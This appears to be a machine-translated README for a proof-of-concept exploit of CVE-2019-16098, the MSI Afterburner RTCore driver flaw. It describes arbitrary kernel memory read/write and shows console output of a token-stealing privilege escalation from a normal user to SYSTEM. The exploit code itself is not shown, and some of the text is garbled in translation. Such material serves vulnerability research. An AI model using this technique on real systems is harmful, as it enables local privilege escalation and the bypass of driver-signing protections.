CVE 2019 16098
1.0.0
Micro-Star MSI Afterburner中的驱动程序4.6.2.15658(aka rtcore64.sys和rtcore32.sys)允许任何身份验证的用户读取和写入任意内存,I/O端口和MSR。可以利用这来利用特权升级,高特权下的代码执行以及信息披露。这些签名的驱动程序也可用于绕过Microsoft驱动程序签名策略以部署恶意代码。
有关更多更新,请访问CVE-2019-16098
警告:硬编码的Windows 10 X64版本1903 Offsess!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
Barakat
C:UsersBarakatsourcereposCVE-2019-16098>outbuildx64-DebugCVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
SYSTEM
C:UsersBarakatsourcereposCVE-2019-16098>